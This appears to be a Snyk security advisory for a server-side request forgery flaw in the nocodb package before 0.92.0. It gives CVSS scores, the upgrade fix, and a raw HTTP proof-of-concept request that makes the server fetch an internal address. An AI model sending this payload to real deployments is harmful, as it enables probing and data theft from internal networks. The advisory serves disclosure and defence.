Server-side Request Forgery (SSRF) Affecting nocodb package, versions <0.92.0


Severity

0.0
high
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.15% (51st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-NOCODB-2944243
  • published 7 Jul 2022
  • disclosed 7 Jul 2022
  • credit Aziz Hakim

How to fix?

Upgrade nocodb to version 0.92.0 or higher.

Overview

nocodb is a NocoDB

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper validation when importing CSV or Excel files via URL. Using this option, exploitation is possible by crafting the responseType parameter.

PoC:

POST /api/v1/db/meta/axiosRequestMake HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
xc-gui: true
xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImRldkBsb2NhbC5ob3N0IiwiZmlyc3RuYW1lIjpudWxsLCJsYXN0bmFtZSI6bnVsbCwiaWQiOiJ1c184OTJhemRkY2F5cXFvcCIsInJvbGVzIjoiIsInRva2VuX3ZlcnNpb24iOiI0MWU5ZDUwIzYWQ2NjFjZjMzNzUxMmJlZDIwZDllNzliNSIsImlhdCI6MTY1NTE4Mjc2OH0.zE-Z0xoYcmKn1Fp5inqdzmf3gfMXWvl64GbS8ahPpF4
Content-Length: 55
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/dashboard/
Cookie: refresh_token=924112616a665e0baeca68cc4c1b815d23d971f655651fe12669176cfbb28c8babcfda6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"apiMeta":{"url":"http://10.0.0.1","responseType":""}}

CVSS Scores

version 3.1
Expand this section

Snyk

7.5 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    None
  • Availability (A)
    None
Expand this section

NVD

7.5 high